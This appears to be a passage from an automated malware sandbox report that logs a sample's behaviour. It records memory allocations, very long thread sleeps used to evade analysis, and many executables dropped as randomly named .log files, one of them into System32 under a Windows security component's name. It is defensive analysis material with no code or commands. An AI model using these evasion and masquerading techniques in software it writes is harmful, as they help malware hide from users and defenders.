                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1AF00000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1030000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1AB80000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1480000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1B120000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 14C0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1B060000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: B60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1AA00000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 12B0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1AC90000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: CD0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 2B10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1AD70000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 2250000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1A420000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1570000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1AF90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1070000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1A9D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1499Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1195Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1357Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1503
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1176
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1287
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1076
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1194
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1260
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1716
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1203
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1160
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1136
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1191
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\GpTgJexz.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\cRJFZrfS.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\qEBmAmuq.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\PGiZSoip.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\HWSrgsLR.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\HiqIapca.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\ifdmuvPD.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\ppsaukgn.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\YKeEIjtU.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\gFDeeVNW.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\aUovvDkq.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\RKwhQDGz.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\sOBLQjau.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\XXkOusIo.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\rreJQTki.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\fIcWIVzb.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\VxjNZniX.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\OQPyFqpt.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\VrbgQkMX.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\cpPftzHM.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\UAZgkvhu.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\LYhyhmcT.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\hcheWwWA.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\qcHMUuVk.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\EhArHZqU.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\zJmzvlwN.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\mYLVFIfJ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\Gumzpbgc.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\GeNRoyLy.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\eqUeBrnj.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\kqnUARmv.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\IaBrEuiC.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\qOBMMFgD.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\aSHMiLLR.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\KMIinpLK.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\yxHkJcLm.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\YGOFIxBr.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\ITtzBsaM.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\zplKRyKf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\RjAOsfOs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\lHqLDiMI.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\VHHMJZBT.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\rThRxFce.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\lsLKjvRr.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\BdpSDMGd.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\yvDYLPoQ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\IsFPfNCu.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\sFNjAptf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\CufHpEgE.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\epactCHB.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\FsrYoeiE.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\aEhUzjWJ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\vhVAXQlb.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\vpESBzMh.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\PPFZCaBl.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\TbmXCvgb.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\SzxHEkUn.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\CYASrcKR.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\JxaHDTDN.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\IYriOWqO.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\CqvSLBwK.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\nDreGkIL.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\PWNGLdXl.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\DfbAZvLY.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\NWAOYYym.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\KJWyVjBG.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\HLSRUZZF.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\BwVbAMfc.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\zdbaQHhe.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\VwwfTkqf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\asCFMbmi.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\kWtSUqip.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\BuRPCyHG.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\ipiVsaGZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\paSjLIrf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\IRjpMTiY.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZHGMdjIP.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\DmprTJmg.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\jEEdizHN.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\ggiwcdaV.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\mHEDqnlH.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\nYgAqZmk.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\rRaDvjLz.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\fhkMXHMd.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\XsgfYcsu.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\QLzxKisH.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\dCQWQdrl.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\rLAuGYci.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EFxianyZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\BzfkqkWQ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\PEYPdPrA.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\NnHgmtso.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\iPDDuStZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\NoRyKQDH.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\MeZIvNrs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\GbyyMOOB.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\kWYnjZbO.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\sphCHAEj.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\iiUfyMfQ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\QvOHgixC.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\lQNLnUfF.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\VxBoFvwp.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\htowkSQD.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\mXotVngM.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\TxYPZkji.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\sIbCbYqd.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\PXvpYVwJ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\LforkokJ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\tyOaygFf.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\MHUibFPy.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\KRGQASbM.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\UUoNBnsb.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\KkdqwYhV.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\bhuvEsaX.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\fQXwQazI.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\bzdouunp.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\kixEeWsX.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\AFZZLiTQ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\ffUEpXBW.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\uENiETnW.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\dpMkGxhC.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\rzTkgNRx.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\oOnUZAGE.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\YwOfwePf.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\tEVbjhhz.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\yzXsqMXs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\WucwbvLj.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\MlipEPMs.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\BCBhhiiL.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\THYplDVu.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\VsDGsRfn.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\NtxFrmGq.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeDropped PE file which has not been started: C:\Users\user\Desktop\KgJXRbxs.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\sYBlcCMG.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\vvDaHluY.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\HSbycbvE.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\CpOixJXm.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeDropped PE file which has not been started: C:\Users\user\Desktop\jUVbmMDs.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exe TID: 7456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 1499 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8832Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep count: 1195 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 1357 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 1503 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8856Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8276Thread sleep count: 1176 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816Thread sleep time: -11068046444225724s >= -30000s
